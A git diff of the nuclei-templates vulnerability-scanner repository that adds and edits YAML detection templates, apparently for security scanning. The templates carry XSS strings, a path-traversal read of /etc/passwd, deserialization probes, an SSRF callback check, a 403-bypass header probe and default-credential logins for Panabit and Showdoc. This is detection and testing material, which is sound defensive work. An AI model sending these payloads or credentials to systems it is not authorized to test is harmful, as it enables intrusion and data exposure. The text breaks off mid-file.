diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index a463dd395a..2040891432 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -1,4 +1,4 @@ -name: syntax-checking +name: ❄️ YAML Lint on: [push, pull_request] diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index c1b7800b18..dccc5d3db2 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -1,4 +1,4 @@ -name: "Auto Update README" +name: 📝 Readme Update on: push: diff --git a/README.md b/README.md index b5047d0c3d..d2c2ebfc27 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 309 | vulnerabilities | 152 | exposed-panels | 126 | -| takeovers | 67 | exposures | 96 | technologies | 66 | -| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | -| default-logins | 24 | exposed-tokens | 0 | dns | 8 | -| fuzzing | 8 | helpers | 8 | iot | 11 | +| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 | +| takeovers | 67 | exposures | 99 | technologies | 67 | +| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 | +| default-logins | 26 | exposed-tokens | 0 | dns | 8 | +| fuzzing | 9 | helpers | 8 | iot | 11 | -**103 directories, 1068 files**. +**105 directories, 1085 files**. diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 056bd4e4e7..319fbfefc2 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -7,7 +7,7 @@ info: description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - tags: phpmyadmin,rce,deserialization + tags: cve,cve2009,phpmyadmin,rce,deserialization requests: - raw: diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index a7ada141e5..49fa9754af 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -10,6 +10,7 @@ info: - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak + tags: cve,cve2015,jetty requests: - method: POST diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml new file mode 100755 index 0000000000..dbce8a980b --- /dev/null +++ b/cves/2017/CVE-2017-12149.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-12149 + +info: + name: Java/Jboss Deserialization [RCE] + author: fopina + severity: critical + description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://chowdera.com/2020/12/20201229190934023w.html + - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 + tags: cve,cve2017,java,rce,deserialization + +requests: + - raw: + - | + POST /invoker/JMXInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + - | + POST /invoker/EJBInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + + matchers-condition: and + matchers: + - type: word + words: + - "ClassCastException" + part: body + + - type: word + words: + - "application/x-java-serialized-object" + part: header \ No newline at end of file diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 531554071a..72e59465d5 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -1,25 +1,31 @@ id: CVE-2017-7269 info: - name: CVE-2017-7269 - author: thomas_from_offensity + name: Windows Server 2003 & IIS 6.0 RCE + author: thomas_from_offensity & @geeknik severity: critical - description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2 - reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py + description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL @@ -27,4 +33,4 @@ requests: - regex(".*?PROPFIND", public) # lowercase header name: Public - regex(".*?PROPFIND", allow) # lowercase header name: Allow condition: or - part: header \ No newline at end of file + part: header diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index fbcb628093..7a95222da5 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,7 +9,7 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf + tags: cve,cve2017,atlassian,jira,ssrf,oob requests: - raw: diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml deleted file mode 100644 index f92d64a488..0000000000 --- a/cves/2018/CVE-2018-0101.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2018-0101 - -info: - name: Cisco ASA Denial-of-Service # Leads to RCE - author: dwisiswant0 - severity: critical - reference: https://www.exploit-db.com/exploits/43986 - description: | - A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, - remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that - the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. - tags: cve,cve2018,cisco,dos,rce - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - X-Aggregate-Auth: 1 - X-Transcend-Version: 1 - Accept-Encoding: identity - X-AnyConnect-Platform: linux-64 - X-Support-HTTP-Auth: false - X-Pad: 0000000000000000000000000000000000000000 - - - - A - - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - - type: dsl - dsl: - - "status_code_2 == 500" - - "status_code_2 == 501" - - "status_code_2 == 502" - - "status_code_2 == 503" - - "status_code_2 == 504" - condition: or - - - type: dsl - dsl: - - "status_code_3 == 200" - negative: true \ No newline at end of file diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml index a60457e799..b88211afef 100644 --- a/cves/2018/CVE-2018-8770.yaml +++ b/cves/2018/CVE-2018-8770.yaml @@ -7,7 +7,7 @@ info: reference: | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ - tags: cobub,razor,exposure + tags: cve,cve2018,cobub,razor,exposure requests: - method: GET diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 8fd852fb23..d4a879970e 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: high reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,lfi + tags: cve.cve2019,jnoj,lfi requests: - raw: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 14b28fbee8..2590d89ea4 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -4,6 +4,7 @@ info: name: Apache Cocoon 2.1.12 XML Injection author: pikpikcu severity: high + tags: cve,cve2020,apache,xml,cocoon description: | When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index f3ebc5fbfd..93175bfeeb 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -18,7 +18,7 @@ requests: - type: word words: - - "{alert(document.domain);}" + - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" part: body - type: word diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 38aa204b52..21b2119cba 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E' matchers-condition: and matchers: @@ -26,5 +26,5 @@ requests: - type: word words: - - '">' + - "'>\"" part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index e0d8d30bd8..2b3e57a5d7 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -26,4 +26,4 @@ requests: part: body group: 1 regex: - - "

PHP Version ([0-9.]+)<\/h1>" + - '

PHP Version ([0-9.]+)<\/h1>' diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index 239c53efee..eb7d3e6d13 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -6,7 +6,7 @@ info: severity: medium description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 - tags: rockethchat + tags: cve,cve2020,rockethchat requests: - raw: diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index ad147b8a20..753c1c727b 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" + - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" matchers-condition: and matchers: @@ -25,3 +25,7 @@ requests: words: - '1' part: body + + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f3e95767f7..f040fb2e36 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce + tags: cve,cve2020,smtp,opensmtpd,network,rce,oob network: - inputs: diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml new file mode 100644 index 0000000000..dfd14878a0 --- /dev/null +++ b/cves/2021/CVE-2021-27651.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-27651 + +info: + name: Pega Infinity Authentication bypass + author: idealphase + description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. + reference: | + - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 + severity: critical + tags: cve,cve2021,pega,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/prweb/PRAuth/app/default/" + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Pega Infinity" + part: body + + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body + + extractors: + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body \ No newline at end of file diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml new file mode 100644 index 0000000000..0e40527eea --- /dev/null +++ b/cves/2021/CVE-2021-31537.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-31537 + +info: + name: SIS-REWE GO version 7.5.0/12C XSS + author: geeknik + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ + severity: medium + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SIS-REWE" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/cves/2021/CVE-2021-31800.yaml b/cves/2021/CVE-2021-31800.yaml new file mode 100644 index 0000000000..fa081899ba --- /dev/null +++ b/cves/2021/CVE-2021-31800.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-31800 + +info: + name: Impacket directory traversal + author: geeknik + description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. + reference: https://github.com/SecureAuthCorp/impacket/pull/1066 + severity: high + tags: impacket,cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml new file mode 100644 index 0000000000..1aff766c6b --- /dev/null +++ b/default-logins/panabit/panabit-default-password.yaml @@ -0,0 +1,45 @@ +id: panabit-gateway-defalut-password + +info: + name: Panabit Default Password + author: pikpikcu + severity: high + reference: https://max.book118.com/html/2017/0623/117514590.shtm + tags: panabit,default-login + +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Length: 246 + Origin: {{BaseURL}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 + Referer: {{BaseURL}}/login/login.htm + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundaryAjZMsILtbrBp8VbC + Content-Disposition: form-data; name="username" + + admin + ------WebKitFormBoundaryAjZMsILtbrBp8VbC + Content-Disposition: form-data; name="password" + + panabit + ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'urn:schemas-microsoft-com:vml' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/showdoc/showdoc-default-password.yaml b/default-logins/showdoc/showdoc-default-password.yaml new file mode 100644 index 0000000000..f992f0dac8 --- /dev/null +++ b/default-logins/showdoc/showdoc-default-password.yaml @@ -0,0 +1,31 @@ +id: showdoc-default-password + +info: + name: Showdoc Default Password + author: pikpikcu + severity: medium + reference: | + - https://blog.star7th.com/2016/05/2007.html + tags: showdoc,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/server/index.php?s=/api/user/login" + body: | + username=showdoc&password=123456&v_code= + + headers: + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + matchers-condition: and + matchers: + + - type: word + words: + - '"username":"showdoc"' + - '"user_token":' + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/microsoft-exchange-control-panel.yaml b/exposed-panels/microsoft-exchange-control-panel.yaml new file mode 100644 index 0000000000..5aa1d49d68 --- /dev/null +++ b/exposed-panels/microsoft-exchange-control-panel.yaml @@ -0,0 +1,24 @@ +id: microsoft-exchange-control-panel + +info: + name: Microsoft Exchange Control Panel + author: r3dg33k + severity: info + description: Publicly accessible Microsoft Exchange Server Control Panel + tags: microsoft,panel + reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html + +requests: + - method: GET + path: + - "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Exchange Admin Center' \ No newline at end of file diff --git a/exposed-panels/tomcat-manager-pathnormalization.yaml b/exposed-panels/tomcat-manager-pathnormalization.yaml index f01b6b09cf..b0300beed9 100644 --- a/exposed-panels/tomcat-manager-pathnormalization.yaml +++ b/exposed-panels/tomcat-manager-pathnormalization.yaml @@ -1,4 +1,5 @@ id: tomcat-manager-pathnormalization + info: name: Tomcat Manager Path Normalization author: organiccrap @@ -11,11 +12,17 @@ requests: path: - '{{BaseURL}}/..;/manager/html' - '{{BaseURL}}/..;/host-manager/html' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + + matchers-condition: and matchers: - type: word words: - - username="tomcat" password="s3cret" - - manager-gui + - 'username="tomcat" password="s3cret"' + - 'manager-gui' condition: and + + - type: status + status: + - 403 + - 401 + negative: true diff --git a/exposures/backups/php-backup-files.yaml b/exposures/backups/php-backup-files.yaml new file mode 100644 index 0000000000..5a9b791a05 --- /dev/null +++ b/exposures/backups/php-backup-files.yaml @@ -0,0 +1,54 @@ +id: php-backup-files + +info: + name: PHP source disclosure through backup files + author: StreetOfHackerR007 (Rohit Soni) + severity: medium + tags: exposure,backup,php + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php.bak" + - "{{BaseURL}}/default.php.bak" + - "{{BaseURL}}/main.php.bak" + - "{{BaseURL}}/config.php.bak" + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/header.php.bak" + - "{{BaseURL}}/footer.php.bak" + - "{{BaseURL}}/login.php.bak" + - "{{BaseURL}}/database.php.bak" + - "{{BaseURL}}/db.php.bak" + - "{{BaseURL}}/conn.php.bak" + - "{{BaseURL}}/db_config.php.bak" + - "{{BaseURL}}/404.php.bak" + - "{{BaseURL}}/wp-config.php.bak" + - "{{BaseURL}}/wp-login.php.bak" + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/plain" + - "bytes" + part: header + condition: or \ No newline at end of file diff --git a/exposures/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml index ceca05ecec..a61a9e8069 100644 --- a/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/exposures/configs/git-config-nginxoffbyslash.yaml @@ -5,7 +5,9 @@ info: severity: medium description: Nginx off-by-slash vulnerability exposes Git configuration. tags: config,exposure - reference: https://twitter.com/Random_Robbie/status/1262676628167110656 + reference: | + - https://twitter.com/Random_Robbie/status/1262676628167110656 + - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py requests: - method: GET diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 3611ef1763..b67f6b3be1 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -17,7 +17,6 @@ requests: - "{{BaseURL}}/.env.prod.local" - "{{BaseURL}}/.env.production.local" - "{{BaseURL}}/.env.local" - - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" matchers-condition: and diff --git a/exposures/configs/ruijie-phpinfo.yaml b/exposures/configs/ruijie-phpinfo.yaml new file mode 100644 index 0000000000..b57e02ab73 --- /dev/null +++ b/exposures/configs/ruijie-phpinfo.yaml @@ -0,0 +1,25 @@ +id: ruijie-phpinfo + +info: + name: Ruijie Phpinfo + author: pikpikcu + severity: low + reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + tags: phpinfo,rujjie,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/view/phpinfo.view.php" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Version" + - "PHP Extension" + condition: and + + - type: status + status: + - 200 diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml new file mode 100644 index 0000000000..694ada23cb --- /dev/null +++ b/fuzzing/xff-403-bypass.yaml @@ -0,0 +1,47 @@ +id: xff-403-bypass + +info: + name: X-Forwarded-For 403-forbidden bypass + author: vavkamil + severity: info + description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. + tags: xff,bypass,fuzz + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip + X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + + - | + GET /test.txt HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip + X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 403 && status_code_2 != 403" + - "status_code_1 == 403 && status_code_3 != 403" + condition: or \ No newline at end of file diff --git a/misconfiguration/apache-filename-brute-force.yaml b/misconfiguration/apache-filename-brute-force.yaml new file mode 100644 index 0000000000..61863aac5d --- /dev/null +++ b/misconfiguration/apache-filename-brute-force.yaml @@ -0,0 +1,29 @@ +id: apache-filename-brute-force +info: + name: Apache Filename Brute Force + author: geeknik + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: | + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + severity: low + tags: apache + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml new file mode 100644 index 0000000000..53750448b2 --- /dev/null +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -0,0 +1,25 @@ +id: cloudflare-external-image-resize + +info: + name: Cloudflare External Image Resizing Misconfiguration + author: vavkamil + severity: info + description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. + reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 + tags: cloudflare,misconfig,oob + +requests: + - raw: + - | + GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close + Accept: */* + Accept-Language: en + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/misconfiguration/springboot/springboot-configprops.yaml b/misconfiguration/springboot/springboot-configprops.yaml index 80d4670abd..ae33a1407f 100644 --- a/misconfiguration/springboot/springboot-configprops.yaml +++ b/misconfiguration/springboot/springboot-configprops.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Sensitive environment variables may not be masked + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index a10ce723fc..986eb3f633 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -3,8 +3,9 @@ id: springboot-env info: name: Detect Springboot Env Actuator author: that_juan_ & dwisiswant0 & wdahlenb - severity: high + severity: low description: Sensitive environment variables may not be masked + tags: springboot,disclosure requests: - method: GET @@ -17,8 +18,14 @@ requests: part: body words: - "applicationConfig" + + - type: word + part: body + words: + - "server.port" - "local.server.port" - condition: and + condition: or + - type: status status: - 200 diff --git a/misconfiguration/springboot/springboot-heapdump.yaml b/misconfiguration/springboot/springboot-heapdump.yaml index 6e544e8135..cd65105506 100644 --- a/misconfiguration/springboot/springboot-heapdump.yaml +++ b/misconfiguration/springboot/springboot-heapdump.yaml @@ -5,12 +5,15 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: critical description: Environment variables and HTTP requests can be found in the HPROF + tags: springboot,disclosure requests: - method: GET path: - "{{BaseURL}}/heapdump" - "{{BaseURL}}/actuator/heapdump" + + max-size: 2097152 # 2MB - Max Size to read from server response matchers-condition: and matchers: - type: binary @@ -20,16 +23,19 @@ requests: - "4850524f46" # "HPROF" - "1f8b080000000000" # Gunzip magic byte condition: or + - type: status status: - 200 + - type: word words: - "application/octet-stream" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" - condition: or part: header + condition: or + - type: dsl dsl: - "len(body) >= 100000" diff --git a/misconfiguration/springboot/springboot-httptrace.yaml b/misconfiguration/springboot/springboot-httptrace.yaml index bd6d211c5d..0b00b04518 100644 --- a/misconfiguration/springboot/springboot-httptrace.yaml +++ b/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: View recent HTTP requests and responses + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-loggers.yaml b/misconfiguration/springboot/springboot-loggers.yaml index d1e73b434f..b5fa03e536 100644 --- a/misconfiguration/springboot/springboot-loggers.yaml +++ b/misconfiguration/springboot/springboot-loggers.yaml @@ -4,6 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_ & dwisiswant0 & wdahlenb severity: low + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-mappings.yaml b/misconfiguration/springboot/springboot-mappings.yaml index 17e058f3e4..69630a8584 100644 --- a/misconfiguration/springboot/springboot-mappings.yaml +++ b/misconfiguration/springboot/springboot-mappings.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Additional routes may be displayed + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-trace.yaml b/misconfiguration/springboot/springboot-trace.yaml index 170360f235..334673e33c 100644 --- a/misconfiguration/springboot/springboot-trace.yaml +++ b/misconfiguration/springboot/springboot-trace.yaml @@ -5,11 +5,13 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: View recent HTTP requests and responses + tags: springboot,disclosure requests: - method: GET path: - "{{BaseURL}}/trace" + matchers-condition: and matchers: - type: word diff --git a/network/rdp-detect.yaml b/network/rdp-detect.yaml new file mode 100644 index 0000000000..c2d8bd5395 --- /dev/null +++ b/network/rdp-detect.yaml @@ -0,0 +1,59 @@ +id: rdp-detect + +info: + name: Windows RDP Detection + author: princechaddha + severity: info + tags: windows,rdp,network + +network: + - inputs: + - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" + type: hex + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:3389" + + matchers: + - type: word + encoding: hex + name: win2000 + words: + - "0300000b06d00000123400" + - type: word + encoding: hex + name: win2003 + words: + - "030000130ed000001234000300080002000000" + - type: word + encoding: hex + name: win2008 + words: + - "030000130ed000001234000200080002000000" + - type: word + encoding: hex + name: 